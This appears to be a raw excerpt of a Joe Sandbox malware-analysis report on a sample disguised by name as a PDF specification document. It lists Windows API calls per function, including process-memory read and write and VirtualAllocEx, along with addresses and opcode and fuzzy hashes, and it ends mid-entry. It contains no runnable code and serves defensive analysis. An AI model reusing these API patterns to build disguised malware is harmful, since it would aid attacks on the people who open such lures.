                                      • Opcode ID: 4b441eb05ff2552a8ee925479b5e34fc7a2a60df7ffbdd34974a1b9544588f65
                                      • Instruction ID: d882687a6ccdb8923175375094e4b7deb3cbbddc1f5c6a30b2e9df70553c03ce
                                      • Opcode Fuzzy Hash: 4b441eb05ff2552a8ee925479b5e34fc7a2a60df7ffbdd34974a1b9544588f65
                                      • Instruction Fuzzy Hash: 292190312002149FDB12AF68CC85F7EB7ADAF89750F044559F956EB3A2CB74AD018B61
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00398441
                                      • GetForegroundWindow.USER32 ref: 00398458
                                      • GetDC.USER32(00000000), ref: 00398494
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 003984A0
                                      • ReleaseDC.USER32(00000000,00000003), ref: 003984DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      • Opcode ID: b0dbf73e51ed40d5c76ce14e27954a27fae2e11d902e31da99bb2faaa7ad307d
                                      • Instruction ID: b17d293d7134817d9f60dc38255fcf90223a7502d9af8af94940b1c2f6ee49dd
                                      • Opcode Fuzzy Hash: b0dbf73e51ed40d5c76ce14e27954a27fae2e11d902e31da99bb2faaa7ad307d
                                      • Instruction Fuzzy Hash: D0216275A00204AFDB01EFA5D845A5EBBE9EF49301F048879F85ADB251DB70BD00CB50
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                      • SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                      • BeginPath.GDI32(?), ref: 0035B009
                                      • SelectObject.GDI32(?,00000000), ref: 0035B033
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: d48dd6f6b9c3a523a5ae58f2fcff88a237080f4df8a23f16f2f3a358fa8a27b1
                                      • Instruction ID: 3935a9393c8e6e01e470ea94aaa9ab50ed3a84c1f585f88ac9f35cc35d2d9038
                                      • Opcode Fuzzy Hash: d48dd6f6b9c3a523a5ae58f2fcff88a237080f4df8a23f16f2f3a358fa8a27b1
                                      • Instruction Fuzzy Hash: A52160B0800205AFDB129F59ED84F9E7BA8B710356F18472AF825A61F0C3715849DB55
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                      • GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                      • GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                      • HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 842720411-0
                                      • Opcode ID: c3c36cac4f3f82dfff899befacf59add2e243ce35c40d141ec2648b7aea02ae0
                                      • Instruction ID: 52c33abca12398fb53ac6cfdb98265a328a187101b003ef60ae5d757ff74544a
                                      • Opcode Fuzzy Hash: c3c36cac4f3f82dfff899befacf59add2e243ce35c40d141ec2648b7aea02ae0
                                      • Instruction Fuzzy Hash: F60181B0200205BFDB224FA5DC48D6B7BACEF89355B114439F409C3250D671DC51CB61
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387A74
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00387A82
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00387A8A
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00387A94
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: f3a3229c5b4e67861c75147ea5f9101db7073a65ddefe592a5d9df06791fe682
                                      • Instruction ID: 5613e833f16b4338959938498a5b60236c1ee5491a71cf8ce3992b85e9689b97
                                      • Opcode Fuzzy Hash: f3a3229c5b4e67861c75147ea5f9101db7073a65ddefe592a5d9df06791fe682
                                      • Instruction Fuzzy Hash: 23012931C04619EBCF06AFE4DC88AEDBB7DFB08711F150495E502F2250DB34E65487A1
                                      APIs
                                      • CLSIDFromProgID.OLE32 ref: 00379ADC
                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00379AF7
                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00379B05
                                      • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00379B15
                                      • CLSIDFromString.OLE32(?,?), ref: 00379B21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: 3b6f7e2978cd5de57ad632d13caed294bf7e4de224f5cb8ab3e5737906c3d0cd
                                      • Instruction ID: d634e4c02750dffa52a9a86994efe2f74cf290f0661a5e38fbe6eb9cd1876852
                                      • Opcode Fuzzy Hash: 3b6f7e2978cd5de57ad632d13caed294bf7e4de224f5cb8ab3e5737906c3d0cd
                                      • Instruction Fuzzy Hash: 32018F76600204BFDB224F64EC44F9ABBEDEB44351F148039F90AE6210D775ED009BA0
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0037AA79
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0037AA83
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0037AA92
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0037AA99
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0037AAAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 6d348caa78b534ec444c49f188941b31b61633cae840ddaaa6147bf77dcbc96a
                                      • Instruction ID: 91657624a1d20a31aa9356a43290fa10c027621c8da6bcfea3027a3411b88132
                                      • Opcode Fuzzy Hash: 6d348caa78b534ec444c49f188941b31b61633cae840ddaaa6147bf77dcbc96a
                                      • Instruction Fuzzy Hash: 28F0C2312003146FEB221FA4EC88E6B3BACFF89754F004029F905C7190DB64AC02CF61
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0037AADA
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAE4
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAF3
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAFA
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AB10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 32c5fce5e0838bfb4952da16771c91b9b0cea00e314d9ae04cfc9f2d452ed483
                                      • Instruction ID: 587ebedc3deeb186a9cf057577990a426df113b7d85bf608e9bc90951bc8a616
                                      • Opcode Fuzzy Hash: 32c5fce5e0838bfb4952da16771c91b9b0cea00e314d9ae04cfc9f2d452ed483
                                      • Instruction Fuzzy Hash: 02F062752012186FEB220FA5EC88E6B3B6DFF85754F014039F946C7190CB65AC02DB61
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0037EC94
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0037ECAB
                                      • MessageBeep.USER32(00000000), ref: 0037ECC3
                                      • KillTimer.USER32(?,0000040A), ref: 0037ECDF
                                      • EndDialog.USER32(?,00000001), ref: 0037ECF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 81d471be8b861655e841c4e0e5558cf48055bdc90ebfc6df2ada8281143b0b7b
                                      • Instruction ID: afda34c6342097eea55e29691c0819d23806fd0027d12b24880c89c25b03e19f
                                      • Opcode Fuzzy Hash: 81d471be8b861655e841c4e0e5558cf48055bdc90ebfc6df2ada8281143b0b7b
                                      • Instruction Fuzzy Hash: F1016D34500715ABEB375B10DE4EF9677BCBB04B05F0045A9F686A54E0DBF4BA54CB44
                                      APIs
                                      • EndPath.GDI32(?), ref: 0035B0BA
                                      • StrokeAndFillPath.GDI32(?,?,003BE680,00000000,?,?,?), ref: 0035B0D6
                                      • SelectObject.GDI32(?,00000000), ref: 0035B0E9
                                      • DeleteObject.GDI32 ref: 0035B0FC
                                      • StrokePath.GDI32(?), ref: 0035B117
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: 2232623dea31af6cd6daa0445b0216fc6a3e7d2c4b62902ca2228f8cf2394ba2
                                      • Instruction ID: 908d28fd08589c3323ac58d6fc00fd62d686dc1addae9dfe1915b40ef7536e49
                                      • Opcode Fuzzy Hash: 2232623dea31af6cd6daa0445b0216fc6a3e7d2c4b62902ca2228f8cf2394ba2
                                      • Instruction Fuzzy Hash: CCF0EC30000644EFDB639F69EE4DB597FA9B710362F088725F825950F0C7729959DF54
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X$p2?l2?
                                      • API String ID: 0-3124981581
                                      • Opcode ID: 8e7786b734be4175496fcc1418076832c678c136d29933a33ecc2a445feff375
                                      • Instruction ID: b409f9a5feed45ed348b3fe8d96d162c6c4283995d6df73253c9d81ae0271178
                                      • Opcode Fuzzy Hash: 8e7786b734be4175496fcc1418076832c678c136d29933a33ecc2a445feff375
                                      • Instruction Fuzzy Hash: DCC18F355043419FCB66EF24C941AAAB7E4FF85350F00492DF9999F2A2DB70ED05CB82
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0038F2DA
                                      • CoCreateInstance.OLE32(003CDA7C,00000000,00000001,003CD8EC,?), ref: 0038F2F2
                                      • CoUninitialize.OLE32 ref: 0038F555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize
                                      • String ID: .lnk
                                      • API String ID: 948891078-24824748
                                      • Opcode ID: 24c9c4a6c6bb7036d1ca7d5e0bbea444fdc8027b9d8688e4ce349a5d75cbfefa
                                      • Instruction ID: e7a13b3f0891bfe8367f9cab395e22c8b1b1bc349835b30e3e98885ce4e9151a
                                      • Opcode Fuzzy Hash: 24c9c4a6c6bb7036d1ca7d5e0bbea444fdc8027b9d8688e4ce349a5d75cbfefa
                                      • Instruction Fuzzy Hash: 77A14C71104301AFD302EF64C881EABB7ECEF99714F00495DF5559B2A2EB70EA49CB52
                                      APIs
                                        • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                      • CoInitialize.OLE32(00000000), ref: 0038E85D
                                      • CoCreateInstance.OLE32(003CDA7C,00000000,00000001,003CD8EC,?), ref: 0038E876
                                      • CoUninitialize.OLE32 ref: 0038E893
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                      • String ID: .lnk
                                      • API String ID: 3769357847-24824748
                                      • Opcode ID: 8a86008b57f9976ed0e5ea8c244137033bf9d81a4d9a0ea25d9e4a31e0d52878
                                      • Instruction ID: 9010150a3e71575910db39baa6c6e3e870ca54d4d17669b385c80a9191caa34a
                                      • Opcode Fuzzy Hash: 8a86008b57f9976ed0e5ea8c244137033bf9d81a4d9a0ea25d9e4a31e0d52878
                                      • Instruction Fuzzy Hash: EDA154356043019FCB16EF14C484E6ABBE5BF89710F058999F99A9B3A2CB31FC45CB81
                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 003A2368
                                      • CloseHandle.KERNEL32(00000000), ref: 003A242F
                                      • FreeLibrary.KERNEL32(00000000), ref: 003A243E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseExecuteFreeHandleLibraryShell
                                      • String ID: @
                                      • API String ID: 2646349028-2766056989
                                      • Opcode ID: 7707456315ae693187413e6395bae5ddac98c55569bf0fae9fdddf8840248e58
                                      • Instruction ID: 5079938de42c4fbd11d3a2c863e3969c2ce58249d2e5e01c407536ef24a0aaa3
                                      • Opcode Fuzzy Hash: 7707456315ae693187413e6395bae5ddac98c55569bf0fae9fdddf8840248e58
                                      • Instruction Fuzzy Hash: 59716174A006199FCF16EF98C8819AEB7F5FF49310F118459E856AF3A1DB34AD40CB90
                                      APIs
                                      • GetMenuItemInfoW.USER32(?), ref: 00385467
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00385513
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0038553D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default
                                      • String ID: 0
                                      • API String ID: 1306138088-4108050209
                                      • Opcode ID: 478dcc94afa328d3e3d77a0dbde5357b8913534f3f2e6bccca5c0b3eed2d7ec2
                                      • Instruction ID: fd8f8805d5e24b2d851a2dd86bf47f5fa601558f7d89966d576ea6a0ef310e29
                                      • Opcode Fuzzy Hash: 478dcc94afa328d3e3d77a0dbde5357b8913534f3f2e6bccca5c0b3eed2d7ec2
                                      • Instruction Fuzzy Hash: 505102712047019BD717AF28C841BABBBE8AF86350F1506AAF896D71E0DBB0DD448B52
                                      APIs
                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,003DDC50,?,0000000F,0000000C,00000016,003DDC50,?), ref: 00384645
                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003846C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: REMOVE$THIS
                                      • API String ID: 3964851224-776492005
                                      • Opcode ID: 34c1463aa1f5bcab3aa28e1bfb647144b6f1a4d5b7d76f2c1e4dcf572a1a2e93
                                      • Instruction ID: 77d769cf1468961bb1d522aa026d9222460629605a2b201531777a2f72db70e6
                                      • Opcode Fuzzy Hash: 34c1463aa1f5bcab3aa28e1bfb647144b6f1a4d5b7d76f2c1e4dcf572a1a2e93
                                      • Instruction Fuzzy Hash: 49414F74A0021A9FCF06EF64C881AAEB7B5FF49304F1480A9F956AF661D734ED45CB50
                                      APIs
                                        • Part of subcall function 0038430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0037BC08,?,?,00000034,00000800,?,00000034), ref: 00384335
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0037C1D3
                                        • Part of subcall function 003842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0037BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00384300
                                        • Part of subcall function 0038422F: GetWindowThreadProcessId.USER32(?,?), ref: 0038425A
                                        • Part of subcall function 0038422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0037BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0038426A
                                        • Part of subcall function 0038422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0037BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00384280
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037C240
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037C28D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 6930892c48bb3461f7d75f02ecb619a3845086fd259d582a9ed05eec691889fd
                                      • Instruction ID: 7da4488d468da707deaae12b3b6c0be081efdf1761b55fe66bef5d11228de72d
                                      • Opcode Fuzzy Hash: 6930892c48bb3461f7d75f02ecb619a3845086fd259d582a9ed05eec691889fd
                                      • Instruction Fuzzy Hash: 6E414E7690021DBFDB12EFA4CC81AEEB7B8AF09300F004499FA45BB181DA756E45CB61
                                      APIs
                                      • GetMenuItemInfoW.USER32 ref: 00385091
                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003850D7
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00401708,00000000), ref: 00385120
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
